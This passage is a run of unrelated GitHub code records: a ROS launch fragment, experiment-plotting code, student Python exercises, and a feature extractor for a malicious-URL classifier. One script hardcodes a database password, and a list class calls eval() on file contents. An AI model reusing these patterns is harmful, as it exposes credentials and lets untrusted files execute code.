\n world = os.path.join(\n get_package_share_directory('turtlebot3_gazebo'),\n 'worlds',\n 'g2w1.world'\n ) \n elif world == 2: \n world = os.path.join(\n get_package_share_directory('turtlebot3_gazebo'),\n 'worlds',\n 'g2w2.world'\n ) \n elif world == 3: \n world = os.path.join(\n get_package_share_directory('turtlebot3_gazebo'),\n 'worlds',\n 'g2w3.world'\n ) \n elif world == 4: \n world = os.path.join(\n get_package_share_directory('turtlebot3_gazebo'),\n 'worlds',\n 'g2w4.world'\n ) \n\n gzserver_cmd = IncludeLaunchDescription(\n PythonLaunchDescriptionSource(\n os.path.join(pkg_gazebo_ros, 'launch', 'gzserver.launch.py')\n ),\n launch_arguments={'world': world}.items()\n )\n\n gzclient_cmd = IncludeLaunchDescription(\n PythonLaunchDescriptionSource(\n os.path.join(pkg_gazebo_ros, 'launch', 'gzclient.launch.py')\n )\n )\n\n robot_state_publisher_cmd = IncludeLaunchDescription(\n PythonLaunchDescriptionSource(\n os.path.join(launch_file_dir, 'robot_state_publisher.launch.py')\n ),\n launch_arguments={'use_sim_time': use_sim_time}.items()\n )\n\n spawn_turtlebot_cmd = IncludeLaunchDescription(\n PythonLaunchDescriptionSource(\n os.path.join(launch_file_dir, 'spawn_turtlebot3.launch.py')\n ),\n launch_arguments={\n 'x_pose': f'{pose[0]}',\n 'y_pose': f'{pose[1]}',\n }.items()\n )\n\n ld = LaunchDescription()\n\n # Add the commands to the launch description\n ld.add_action(gzserver_cmd)\n ld.add_action(gzclient_cmd)\n ld.add_action(robot_state_publisher_cmd)\n ld.add_action(spawn_turtlebot_cmd)\n\n return ld\n","repo_name":"autonomous-robots/worlds_gazebo","sub_path":"launch/turtlebot3_world.launch.py","file_name":"turtlebot3_world.launch.py","file_ext":"py","file_size_in_byte":4944,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"41138375440","text":"import psycopg2 as psycopg2\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\nsns.set_theme(style=\"whitegrid\")\nimg_path = '/Users/tim/master-thesis/latex/img/experiments/'\n# sns.set(rc = {'figure.figsize':(11,8)})\nalgorithms_order = ['Seeded DynaMOSA', 'DynaMOSA', 'Seeded Random Search', 'Random Search']\ncrates_order = ['time', 'gamie', 'lsd', 'humantime', 'quick_xml', 'tight']\n\nwith psycopg2.connect(\"dbname=rustyunit user=rust password=Lz780231Ray\") as conn:\n sql_seeded_random = \"select * from experiments_seeded_random;\"\n seeded_random_data = pd.read_sql_query(sql_seeded_random, conn)\n seeded_random_data['Algorithm'] = 'Seeded Random Search'\n seeded_random_data = seeded_random_data[seeded_random_data['crate'] != 'toycrate']\n\n sql_random = \"select * from experiments_random;\"\n random_data = pd.read_sql_query(sql_random, conn)\n random_data['Algorithm'] = 'Random Search'\n random_data = random_data[random_data['crate'] != 'toycrate']\n\n sql_seeded_dynamosa = \"select * from experiments_seeded_dynamosa;\"\n seeded_dynamosa_data = pd.read_sql_query(sql_seeded_dynamosa, conn)\n seeded_dynamosa_data['Algorithm'] = 'Seeded DynaMOSA'\n seeded_dynamosa_data = seeded_dynamosa_data[seeded_dynamosa_data['crate'] != 'toycrate']\n\n sql_dynamosa = \"select * from experiments_dynamosa;\"\n dynamosa_data = pd.read_sql_query(sql_dynamosa, conn)\n dynamosa_data['Algorithm'] = 'DynaMOSA'\n dynamosa_data = dynamosa_data[dynamosa_data['crate'] != 'toycrate']\n\n data = pd.concat([seeded_random_data, random_data, seeded_dynamosa_data, dynamosa_data])\n\n plot_data = data.groupby(['Algorithm', 'gen']).mean()\n fig = plt.figure(1)\n # mir_coverage, 
tests_length, tests, covered_targets\n\n    coverage_plot = sns.lineplot(x=\"gen\", y=\"mir_coverage\",\n                                 hue=\"Algorithm\",  # style=\"event\",\n                                 data=plot_data, hue_order=algorithms_order)\n    coverage_plot.get_legend().set_title(None)\n    coverage_plot.set(xlabel=\"Generation\", ylabel=\"Basic block coverage\")\n    plt.show()\n    fig.savefig(img_path + 'coverage-over-time-crates.png', dpi=300, format='png', bbox_inches='tight')\n","repo_name":"foxycom/rusty-unit","sub_path":"experiments/coverage_lineplot.py","file_name":"coverage_lineplot.py","file_ext":"py","file_size_in_byte":2201,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"4"} {"seq_id":"75183676917","text":"# Write a class Vect, inherited from list, with the following changes:\r\n# ◦\tWhen an instance is created, it must be checked that\r\n# 1\tall elements of the sequence are of the same type\r\n# 2\tthis type supports addition and multiplication by a number\r\n# ◦\tOtherwise a TypeError exception is raised\r\n# ◦\tThe class supports element-wise multiplication by a number: vect @ 5\r\n# ◦\tThe class supports element-wise addition (instead of concatenation): vect1 + vect2\r\n# ◦\tThe class supports writing to a file vect.write(\"file\") and reading from a file vect.read(\"file\") (any file name)\r\n# ◦\tExample:\r\n#\r\n# 1 >>> v, w = Vect(range(9)), Vect(range(10,16))\r\n# 2 >>> v, w\r\n# 3 ([0, 1, 2, 3, 4, 5, 6, 7, 8], [10, 11, 12, 13, 14, 15])\r\n# 4 >>> v+w\r\n# 5 [10, 12, 14, 16, 18, 20]\r\n# 6 >>> v@3\r\n# 7 [0, 3, 6, 9, 12, 15, 18, 21, 24]\r\n# 8 >>> s = Vect(\"QWER\")\r\n# 9 >>> s\r\n# 10 ['Q', 'W', 'E', 'R']\r\n# 11 >>> s+\"ASDFG\"\r\n# 12 ['QA', 'WS', 'ED', 'RF']\r\n# 13 >>> s@4\r\n# 14 ['QQQQ', 'WWWW', 'EEEE', 'RRRR']\r\n# 15 >>> l = Vect(i*2+1 for i in range(6))\r\n# 16 >>> l\r\n# 17 [1, 3, 5, 7, 9, 11]\r\n# 18 >>> e = Vect((1,2,3,4.4,5,6))\r\n\r\nclass Vect(list):\r\n    def __add__(self, other):\r\n        result = Vect()\r\n        size = min(len(self), len(other))\r\n        for i in range(size):\r\n            result.append(self[i] + other[i])\r\n        return result\r\n\r\n    def __matmul__(self, other):\r\n        # element-wise multiplication by a number, so that vect @ 3 works\r\n        return Vect(x * other for x in self)\r\n\r\n    def write(self, path):\r\n        with open(path, 'w') as output:\r\n            output.write(str(self))\r\n\r\n    def read(self, path):\r\n        with open(path, 'r') as source:\r\n            lst = list(eval(source.read()))\r\n        self.clear()\r\n        self.extend(lst)\r\n\r\n\r\nv = Vect(range(9))\r\n# v.write('output1.txt')\r\nv.read('output1.txt')\r\nprint('bye')\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"cryptoEcho/MSU_python2021","sub_path":"04.24_2.py","file_name":"04.24_2.py","file_ext":"py","file_size_in_byte":2242,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} {"seq_id":"13833223632","text":"def longest_valid(s):\n    match = [0] * (len(s) + 1)\n    for i in range(1, len(s)):\n        if s[i] in '{':\n            continue\n        opener = '{'['}'.index(s[i])]\n        start = i - 1 - match[i - 1]\n        if start < 0:\n            continue\n        if s[start] != opener:\n            continue\n        match[i] = i - start + 1 + match[start - 1]\n    best = max(match)\n    end = match.index(best)\n    return s[end + 1 - best:end + 1]\n\n\nprint(len(longest_valid(input())))\n\nt = int(input())\npoint = []\nfor i in range(t):\n    point.append(list(map(int, input().split())))\n","repo_name":"lalit21-logico/programming","sub_path":"brac.py","file_name":"brac.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} {"seq_id":"24849543033","text":"while 
True:\r\n    try:\r\n        N = int(input('Enter N: '))\r\n        if 1<=N<=1000: break\r\n        print('1≤N≤1000 !')\r\n    except ValueError:\r\n        print('Invalid input!')\r\n\r\nсловарь = {k[0]:' '.join(k[1:]) for k in [input(f'Enter record {i+1}: ').split() for i in range(N)]}\r\n\r\nwhile True:\r\n    try:\r\n        M = int(input('Enter M: '))\r\n        if 1<=M<=100: break\r\n        print('1≤M≤100 !')\r\n    except ValueError:\r\n        print('Invalid input!')\r\n\r\nслова = [input(f'Enter word {i+1}: ') for i in range(M)]\r\n\r\n[print(f'{i}:', словарь.setdefault(i, 'Not in dictionary')) for i in слова]","repo_name":"Irina-Sinyukova/PY2","sub_path":"PY/Ddictionary.py","file_name":"Ddictionary.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} {"seq_id":"42506501283","text":"#!/usr/bin/env python2.7\n# -*- coding: utf-8 -*-\n\"\"\"\nFeature vector construction\n\n\"\"\"\nimport tldextract\nimport numpy as np\n\nfrom get_lexical import UrlLexical\nfrom get_whois import extract_feature_whois\nfrom get_rank import get_scheme_domain\n\n\nclass build_feature(object):\n    def __init__(self, data_obj, url_ip_map, url_ip_dmap, pdomain_whois_map, domain_rank_map, domain_cert_map, \\\n        domain_pr_map, sus_domain):\n        self.data_obj = data_obj\n        self.url_ip_map = url_ip_map\n        self.url_ip_dmap = url_ip_dmap\n        self.pdomain_whois_map = pdomain_whois_map\n        self.domain_rank_map = domain_rank_map\n        self.domain_cert_map = domain_cert_map\n        self.domain_pr_map = domain_pr_map\n        self.sus_domain = sus_domain\n\n    def __getkey(self, url):\n        # extract lexical features\n        lex_obj = UrlLexical(url)\n        filename, filepath, pdomain_token, sdomain_token = lex_obj.do_extract()\n\n        # look up the domain rank\n        scheme_domain = get_scheme_domain(url)\n        rank = self.domain_rank_map.get(scheme_domain, None)\n\n        # extract WHOIS features\n        whois_obj = extract_feature_whois(url, self.pdomain_whois_map)\n        exp_timedelta = whois_obj.get_exp_timedelta()\n        reg_timedelta = whois_obj.get_reg_timedelta()\n        upd_timedelta = whois_obj.get_update_timedelta()\n        timedelta = whois_obj.get_timedelta()\n        registrar = whois_obj.get_registrar()\n\n        # get the pay-level domain (pdomain)\n        tld_obj = tldextract.extract(lex_obj.url_domain)\n        url_pdomain = \".\".join([tld_obj.domain, tld_obj.suffix])\n        url_domain = lex_obj.url_domain\n        url_path = lex_obj.url_path\n        url_netloc = lex_obj.url_netloc\n\n        return filename, filepath, pdomain_token, sdomain_token, rank, exp_timedelta, reg_timedelta, upd_timedelta,\\\n            timedelta, registrar, url_pdomain, url_domain, url_path, url_netloc\n\n    def build_feature(self, url):\n        \"\"\"\n        :param url:\n        :return:\n        \"\"\"\n        filename, filepath, pdomain_token, sdomain_token, rank, exp_timedelta, reg_timedelta, upd_timedelta,\\\n            timedelta, registrar, url_pdomain, url_domain, url_path, url_netloc = self.__getkey(url)\n\n        feature = np.zeros((1, 30), dtype=np.float32)\n\n        # feature 1: domain path length\n        if url_domain in self.data_obj.domain_path_map:\n            feature[0][0] = len(self.data_obj.domain_path_map[url_domain])\n        \n        # feature 2: filename\n        if filename and filename in self.data_obj.mal_filename:\n            feature[0][1] = 1\n        \n#         if filename and filename in self.data_obj.ben_filename:\n#             feature[0][2] = 1\n\n        # feature 3: filepath\n        if filepath and filepath in self.data_obj.mal_filepath:\n            feature[0][3] = 1\n        \n#         if filename and filename in self.data_obj.ben_filepath:\n#             feature[0][4] = 1\n\n        # feature 4: domain tokens\n        for token in pdomain_token:\n            if token in self.data_obj.mal_pdomain_tokens:\n                feature[0][5] = 1\n            if token in self.data_obj.ben_pdomain_tokens:\n                feature[0][7] = 1\n\n        for token in 
sdomain_token:\n            if token in self.data_obj.mal_sdomain_tokens:\n                feature[0][6] = 1\n            if token in self.data_obj.ben_sdomain_tokens:\n                feature[0][8] = 1\n\n        # feature 5: ip\n        if url in self.url_ip_map and self.url_ip_map[url].rsplit(\".\", 1)[0] in self.data_obj.mal_ips:\n            feature[0][9] += 1\n\n        # feature 6: registration time\n        if reg_timedelta is not None:\n            feature[0][10] = reg_timedelta\n\n        # feature 7 reg exp time\n        if timedelta is not None:\n            feature[0][11] = timedelta\n\n        # feature 8: update time\n        if upd_timedelta is not None:\n            feature[0][12] = upd_timedelta\n\n        # feature 9 rank:\n        if rank is None or rank > 10000000:\n            feature[0][13] = 1\n\n        if rank is not None and rank < 100000:\n            feature[0][14] = 1\n\n        # feature 10 cert:\n        if url_domain in self.domain_cert_map and not isinstance(self.domain_cert_map[url_domain], int):\n            feature[0][15] = 1\n\n        # feature 11 maltrail:\n        if url_domain in self.sus_domain:\n            feature[0][16] = 1\n\n        # feature 12 port num\n        if url_pdomain in self.data_obj.domain_port_map:\n            feature[0][17] = len(self.data_obj.domain_port_map[url_pdomain])\n\n        # feature 15-17 filename lexical\n        if filename and filename.count(\"%\") / float(len(filename)) > 0.2 and filename[-3:] == \"exe\":\n            feature[0][18] = 1\n\n        if filename and filename.count(\"@\") > 0:\n            feature[0][19] = 1\n\n        # feature 19 path level count\n        if url_path:\n            feature[0][20] = url_path.count(\"/\")\n\n        # feature 20-21\n        if url_domain in self.url_ip_dmap:\n            feature[0][21] = len(self.url_ip_dmap[url_domain][1])\n            feature[0][22] = len(self.url_ip_dmap[url_domain][2])\n\n        if url_domain:\n            for char in url_domain:\n                if char.isdigit():\n                    feature[0][23] += 1\n\n            feature[0][24] = len(url_domain) / url_domain.count(\".\")\n            feature[0][25] = max([len(_) for _ in url_domain.split(\".\")])\n\n        # feature 22 name servers count\n        if url_pdomain in self.pdomain_whois_map and 'name_servers' in self.pdomain_whois_map[url_pdomain] and \\\n                self.pdomain_whois_map[url_pdomain]['name_servers']:\n            feature[0][26] = len(self.pdomain_whois_map[url_pdomain]['name_servers'])\n\n        if url_pdomain in self.pdomain_whois_map and 'status' in self.pdomain_whois_map[url_pdomain] and \\\n                self.pdomain_whois_map[url_pdomain]['status']:\n            feature[0][27] = len(self.pdomain_whois_map[url_pdomain]['status'])\n\n        if url_domain in self.domain_pr_map and self.domain_pr_map[url_domain] > 0:\n            feature[0][28] = 1\n\n# deeper dig into geo info\n\n#         if domain in url_ip_dmap:\n#             asn_set = set()\n#             ips = url_ip_dmap[domain][2]\n#             for ip in ips:\n#                 asn_set.add(asndb.asn_by_addr(ip))\n#             feature[0][25] = len(asn_set)\n\n#         if domain in url_ip_dmap:\n#             geo_set = set()\n#             ips = url_ip_dmap[domain][2]\n#             for ip in ips:\n#                 if citydb.record_by_name(ip):\n#                     geo_set.add(citydb.record_by_name(ip)['city'])\n#             feature[0][26] = len(geo_set)\n\n#         feature filename\n\n#         if filename:\n#             feature[0][29] = filename.count(\"_\")\n\n#         feature whois emails\n\n#         if pdomain in whois_dict and 'emails' in whois_dict and whois_dict[pdomain]['emails']:\n#             feature[0][23] = len(whois_dict[pdomain]['emails'])\n\n#         feature whois country\n\n#         if pdomain in whois_dict and 'country' in whois_dict and whois_dict[pdomain]['country']!=\"CN\":\n#             feature[0][23] = 1\n\n#         feature registrar\n\n#         vector_obj = HashingVectorizer(n_features=64)\n#         if registrar:\n#             ff_add = vector_obj.fit_transform([registrar]).toarray()\n#         else:\n#             ff_add = np.zeros((1, 64), dtype = np.float32)\n#         feature = np.concatenate((feature, ff_add), axis = 1)\n\n#         feature asn ratio\n\n#         if url in url_ip_map and url_ip_map[url] !='unknown':\n#             asn = 
asndb.lookup(url_ip_map[url])[0]\n# if asn is not None and asn in asn_score_map:\n# feature[0][22] = asn_score_map[asn]\n\n return feature\n\n\n def build_feature_set(self, urls):\n feature = []\n for url in urls:\n feature.append(self.build_feature(url))\n feature = np.concatenate(feature, axis=0)\n return feature","repo_name":"angelfish91/URL-XGB","sub_path":"make_feature.py","file_name":"make_feature.py","file_ext":"py","file_size_in_byte":7952,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"2325691455","text":"def group_values_by_indices(values, indices):\n groups = {}\n for value, index in zip(values, indices):\n if index not in groups:\n groups[index] = []\n groups[index].append(value)\n\n # Sort the dictionary by its keys and return the values\n return [groups[key] for key in sorted(groups)]\n\n\n# Example usage\nvalues = [1, 2, 3, 4, 5, 6, 7, 8]\nindices = [3, 3, 1, 1, 2, 2, 2, 4]\nprint(group_values_by_indices(values, indices))","repo_name":"jidec/bigcrittercolor","sub_path":"tests/scratch_experiments/group_by_indices.py","file_name":"group_by_indices.py","file_ext":"py","file_size_in_byte":453,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"28958375553","text":"import numpy as np\nfrom matplotlib import pyplot as plt\n\n\nclass MapVisualizer:\n def __init__(self,size_meters,pixels):\n # size_meters: estimated map size, e.g. 10m x 10m\n # pixels: map matrix size, e.g. [1000,1000]\n self.size_meters=size_meters\n self.pixels=pixels\n self.resolution=size_meters/pixels\n self.vehicle=None\n self.img=None\n self.previous_X = [-1, -1]\n self.setlabels()\n\n def setlabels(self):\n fig=plt.figure(figsize=(7,7))\n mng = plt.get_current_fig_manager()\n plt.ion()\n self.ax = fig.gca()\n self.ax.set_xlabel('X (m)')\n self.ax.set_ylabel('Y (m)')\n self.ax.grid(False)\n plt.title('GMAPPING')\n # self.ax.set_xlim([0, self.pixels])\n self.ax.set_ylim([0, self.pixels])\n ticks=np.arange(0,self.size_meters+1)\n labels = [str(tick) for tick in ticks]\n self.ax.set_xticks(ticks/self.resolution)\n self.ax.set_yticks(ticks/self.resolution)\n self.ax.set_xticklabels(labels)\n self.ax.set_yticklabels(labels)\n\n def visualize(self,X,map_matrix):\n # X: [x,y,theta]\n # map_matrix: same as hw1\n\n # If pre-processing on input values is needed:(from hw1)\n # map_matrix[map_matrix < 0] = -1\n # map_matrix[map_matrix > 0] = 1 - map_matrix[map_matrix > 0]\n\n if self.vehicle:\n self.vehicle.remove()\n self.vehicle=self.ax.arrow(X[0]/self.resolution, X[1]/self.resolution,\n 0.1*np.cos(X[2]), 0.1*np.sin(X[2]), head_width=2, fc='r', ec='r')\n if (self.previous_X[0] != -1):\n self.ax.plot([self.previous_X[0]/self.resolution, X[0]/self.resolution], [self.previous_X[1]/self.resolution, X[1]/self.resolution], \"r\")\n if self.img is None:\n self.img = self.ax.imshow(map_matrix.T, cmap='Greys')\n else:\n self.img.set_data(map_matrix.T)\n self.previous_X = X\n plt.pause(0.0001)\n plt.draw()\n\n\n\n# # Example in 25 steps:\n# map_visualizer=MapVisualizer(8,1000)\n# for i in range(25):\n# X = [0.2*i, 0.3*i, i*np.pi / 4]\n# test=np.random.rand(1000000).reshape((1000,1000))\n# map_visualizer.visualize(X,test)\n\n\n","repo_name":"Zhefan-Xu/gmapping","sub_path":"MapVisualization.py","file_name":"MapVisualization.py","file_ext":"py","file_size_in_byte":2228,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"4"} +{"seq_id":"33317835282","text":"import 
collections\nfrom tree import TreeNode, make_binary_tree\n\n\ndef first_solution(root: TreeNode) -> int:\n if not root:\n return 0\n depths = []\n\n def dfs(node, depth):\n if node.left is None and node.right is None:\n depths.append(depth)\n return depth\n depth += 1\n\n for child in [node.left, node.right]:\n if child is not None:\n dfs(child, depth)\n return depth\n\n dfs(root, 1)\n return max(depths)\n\n\ndef second_solution(root: TreeNode) -> int:\n if not root:\n return 0\n max_depth = 0\n\n def dfs(node, depth, maximum):\n if node.left is None and node.right is None:\n return max(maximum, depth)\n depth += 1\n\n for child in [node.left, node.right]:\n if child is not None:\n maximum = dfs(child, depth, maximum)\n return maximum\n\n return dfs(root, 1, max_depth)\n\n\ndef third_solution(root: TreeNode) -> int:\n queue = collections.deque([root])\n depth = 0\n\n while queue:\n depth += 1\n for _ in range(len(queue)):\n node = queue.popleft()\n if node.left:\n queue.append(node.left)\n if node.right:\n queue.append(node.right)\n return depth\n\n\nif __name__ == \"__main__\":\n tree = [3, 9, 20, None, None, 15, 7]\n root = make_binary_tree(tree)\n print(third_solution(root))\n","repo_name":"youngbin-ro/problem-solving","sub_path":"python-algorithm-interview-book/chapter14. tree/maximum-depth-of-binary-tree.py","file_name":"maximum-depth-of-binary-tree.py","file_ext":"py","file_size_in_byte":1422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"9421405742","text":"from typing import Any, Optional, Sequence, Union\n\nimport torch\nfrom torch import Tensor, tensor\n\nfrom torchmetrics.functional.regression.r2 import _r2_score_update\nfrom torchmetrics.functional.regression.rse import _relative_squared_error_compute\nfrom torchmetrics.metric import Metric\nfrom torchmetrics.utilities.imports import _MATPLOTLIB_AVAILABLE\nfrom torchmetrics.utilities.plot import _AX_TYPE, _PLOT_OUT_TYPE\n\nif not _MATPLOTLIB_AVAILABLE:\n __doctest_skip__ = [\"RelativeSquaredError.plot\"]\n\n\nclass RelativeSquaredError(Metric):\n r\"\"\"Computes the relative squared error (RSE).\n\n .. 
math:: \\text{RSE} = \\frac{\\sum_i^N(y_i - \\hat{y_i})^2}{\\sum_i^N(y_i - \\overline{y})^2}\n\n Where :math:`y` is a tensor of target values with mean :math:`\\overline{y}`, and\n :math:`\\hat{y}` is a tensor of predictions.\n\n If num_outputs > 1, the returned value is averaged over all the outputs.\n\n As input to ``forward`` and ``update`` the metric accepts the following input:\n\n - ``preds`` (:class:`~torch.Tensor`): Predictions from model in float tensor with shape ``(N,)``\n or ``(N, M)`` (multioutput)\n - ``target`` (:class:`~torch.Tensor`): Ground truth values in float tensor with shape ``(N,)``\n or ``(N, M)`` (multioutput)\n\n As output of ``forward`` and ``compute`` the metric returns the following output:\n\n - ``rse`` (:class:`~torch.Tensor`): A tensor with the RSE score(s)\n\n Args:\n num_outputs: Number of outputs in multioutput setting\n squared: If True returns RSE value, if False returns RRSE value.\n kwargs: Additional keyword arguments, see :ref:`Metric kwargs` for more info.\n\n Example:\n >>> from torchmetrics.regression import RelativeSquaredError\n >>> target = torch.tensor([3, -0.5, 2, 7])\n >>> preds = torch.tensor([2.5, 0.0, 2, 8])\n >>> relative_squared_error = RelativeSquaredError()\n >>> relative_squared_error(preds, target)\n tensor(0.0514)\n\n \"\"\"\n is_differentiable = True\n higher_is_better = False\n full_state_update = False\n sum_squared_error: Tensor\n sum_error: Tensor\n residual: Tensor\n total: Tensor\n\n def __init__(\n self,\n num_outputs: int = 1,\n squared: bool = True,\n **kwargs: Any,\n ) -> None:\n super().__init__(**kwargs)\n\n self.num_outputs = num_outputs\n\n self.add_state(\"sum_squared_error\", default=torch.zeros(self.num_outputs), dist_reduce_fx=\"sum\")\n self.add_state(\"sum_error\", default=torch.zeros(self.num_outputs), dist_reduce_fx=\"sum\")\n self.add_state(\"residual\", default=torch.zeros(self.num_outputs), dist_reduce_fx=\"sum\")\n self.add_state(\"total\", default=tensor(0), dist_reduce_fx=\"sum\")\n self.squared = squared\n\n def update(self, preds: Tensor, target: Tensor) -> None:\n \"\"\"Update state with predictions and targets.\"\"\"\n sum_squared_error, sum_error, residual, total = _r2_score_update(preds, target)\n\n self.sum_squared_error += sum_squared_error\n self.sum_error += sum_error\n self.residual += residual\n self.total += total\n\n def compute(self) -> Tensor:\n \"\"\"Computes relative squared error over state.\"\"\"\n return _relative_squared_error_compute(\n self.sum_squared_error, self.sum_error, self.residual, self.total, squared=self.squared\n )\n\n def plot(\n self, val: Optional[Union[Tensor, Sequence[Tensor]]] = None, ax: Optional[_AX_TYPE] = None\n ) -> _PLOT_OUT_TYPE:\n \"\"\"Plot a single or multiple values from the metric.\n\n Args:\n val: Either a single result from calling `metric.forward` or `metric.compute` or a list of these results.\n If no value is provided, will automatically call `metric.compute` and plot that result.\n ax: An matplotlib axis object. If provided will add plot to that axis\n\n Returns:\n Figure and Axes object\n\n Raises:\n ModuleNotFoundError:\n If `matplotlib` is not installed\n\n .. plot::\n :scale: 75\n\n >>> from torch import randn\n >>> # Example plotting a single value\n >>> from torchmetrics.regression import RelativeSquaredError\n >>> metric = RelativeSquaredError()\n >>> metric.update(randn(10,), randn(10,))\n >>> fig_, ax_ = metric.plot()\n\n .. 
plot::\n            :scale: 75\n\n            >>> from torch import randn\n            >>> # Example plotting multiple values\n            >>> from torchmetrics.regression import RelativeSquaredError\n            >>> metric = RelativeSquaredError()\n            >>> values = []\n            >>> for _ in range(10):\n            ...     values.append(metric(randn(10,), randn(10,)))\n            >>> fig, ax = metric.plot(values)\n\n        \"\"\"\n        return self._plot(val, ax)\n","repo_name":"Lightning-AI/torchmetrics","sub_path":"src/torchmetrics/regression/rse.py","file_name":"rse.py","file_ext":"py","file_size_in_byte":4864,"program_lang":"python","lang":"en","doc_type":"code","stars":1718,"dataset":"github-code","pt":"4"} {"seq_id":"33554070991","text":"import helper\nfrom da_bell_secrets import *\nfrom providers import PROVIDERS\nimport smtplib, ssl\nfrom email import encoders\nfrom email.mime.base import MIMEBase\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\nimport pathlib\n\n''' \nThis program sends an SMS/MMS message to the \nowner of a Da Bell device to notify them that \nthe doorbell was pressed, along with a photo. \n\nInfo: Attachment can be at most 1MB\nHad to learn that the hard way.\n'''\n\ndef send_text_message(file_path):\n    __send_mms_via_email(file_path)\n\n@helper.threaded\ndef __send_mms_via_email(file_path):\n    # initialize variables needed\n    phone_number: str = PHONE_NUMBER\n    door_ring_message: str = helper.DOOR_RING_MESSAGE\n    file_path: str = file_path\n    mime_maintype: str = helper.FILE_TYPE\n    # strip the leading dot so MIMEBase gets a bare subtype such as 'jpg'\n    mime_subtype: str = pathlib.Path(file_path).suffix.lstrip('.')\n    file_name: str = pathlib.Path(file_path).name\n    phone_provider: str = PHONE_PROVIDER\n    sender_credentials: tuple = SENDER_CREDENTIALS\n    subject: str = helper.APP_NAME\n    smtp_server: str = helper.SMTP_GMAIL\n    smtp_port: int = helper.SMTP_PORT\n    \n    # get/create information needed to send message\n    # get gmail and password from da_bell_secrets.py\n    sender_email, email_password = sender_credentials\n    \n    # get message type (sms/mms) based on provider; some carriers\n    # do not allow mms, so fall back to the SMS gateway for those\n    message_type = helper.MESSAGE_TYPE[0] \\\n        if PROVIDERS.get(phone_provider).get(helper.MMS_SUPPORT_KEY) \\\n        else helper.MESSAGE_TYPE[1]\n    \n    # create receiver email based on their phone number and carrier\n    receiver_email = f'{phone_number}@{PROVIDERS.get(phone_provider).get(message_type)}'\n    \n    # create gmail body\n    email_message = MIMEMultipart()\n    email_message[\"Subject\"] = subject\n    email_message[\"From\"] = sender_email\n    email_message[\"To\"] = receiver_email\n    email_message.attach(MIMEText(door_ring_message, helper.TEXT_TYPE))\n    \n    # open file being sent and attach to email_message\n    with open(file_path, helper.READ_BINARY) as attachment:\n        part = MIMEBase(mime_maintype, mime_subtype)\n        part.set_payload(attachment.read())\n        encoders.encode_base64(part)\n        part.add_header(\n            \"Content-Disposition\", f\"attachment; filename={file_name}\",\n        )\n        email_message.attach(part)\n\n    # send the message\n    with smtplib.SMTP_SSL(smtp_server, smtp_port, context = ssl.create_default_context()) as email:\n        # securely login to gmail\n        email.login(sender_email, email_password)\n        # send email with body and attachment\n        email.sendmail(sender_email, receiver_email, email_message.as_string())\n        print(\"Da Bell owner notified that doorbell was pressed\")\n    ","repo_name":"Amark18/Da-Bell","sub_path":"mms.py","file_name":"mms.py","file_ext":"py","file_size_in_byte":2739,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} {"seq_id":"18753118228","text":"from django import forms\nfrom 
django.core.exceptions import ValidationError\nfrom django.contrib.auth import get_user_model, forms as user_forms\nfrom django.utils.translation import gettext_lazy as _\n\n\nclass UserCreateForm(user_forms.UserCreationForm):\n email = forms.EmailField()\n\n class Meta:\n model = get_user_model()\n fields = (\"username\", \"email\", )\n field_classes = {\"username\": user_forms.UsernameField}\n\n\nclass UserUpdateForm(forms.ModelForm):\n email = forms.EmailField()\n\n class Meta:\n model = get_user_model()\n fields = (\"username\", \"email\", \"first_name\", \"last_name\", )\n field_classes = {\"username\": user_forms.UsernameField}\n\n def clean_email(self):\n email = self.cleaned_data['email']\n username = self.cleaned_data['username']\n user_with_email = get_user_model().objects.filter(email=email).exclude(username=username)\n if not user_with_email.exists():\n return email\n else:\n raise ValidationError(_('User with this email address already exists'))\n","repo_name":"infohata/ptu2_adboard","sub_path":"adboard/user_menu/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1072,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"69970251672","text":"from Components.config import config\nfrom .Debug import logger\nfrom .FileUtils import readFile, writeFile\nfrom .CutListUtils import ptsToSeconds\n\n\nclass ParserMetaFile():\n\n\tmeta_keys = [\n\t\t\"service_reference\", \"name\", \"description\", \"rec_time\", \"tags\", \"length\", \"size\", \"service_data\"\n\t]\n\n\txmeta_keys = [\n\t\t\"timer_start_time\", \"timer_stop_time\", \"recording_start_time\", \"recording_stop_time\", \"recording_margin_before\",\n\t\t\"recording_margin_after\"\n\t]\n\n\tdef __init__(self, path):\n\t\tself.path = path\n\t\tself.meta_path = path + \".meta\"\n\t\tself.xmeta_path = path + \".xmeta\"\n\t\tself.meta = {}\n\t\tself.xmeta = {}\n\n\t\tself.meta_list = self.readMeta(self.meta_path)\n\t\tif self.meta_list:\n\t\t\tself.meta = self.list2dict(self.meta_list, self.meta_keys)\n\t\t\tif self.meta:\n\t\t\t\tself.meta[\"length\"] = ptsToSeconds(self.meta[\"length\"])\n\t\t\tself.xmeta_list = self.readMeta(self.xmeta_path)\n\t\t\tself.xmeta = self.list2dict(self.xmeta_list, self.xmeta_keys)\n\t\t\tif self.meta and not self.xmeta:\n\t\t\t\tself.xmeta[\"recording_start_time\"] = self.meta[\"rec_time\"]\n\t\t\t\tself.xmeta[\"recording_stop_time\"] = 0\n\t\t\t\tself.xmeta[\"recording_margin_before\"] = config.recording.margin_before.value * 60\n\t\t\t\tself.xmeta[\"recording_margin_after\"] = config.recording.margin_after.value * 60\n\n\tdef list2dict(self, alist, keys):\n\t\tadict = 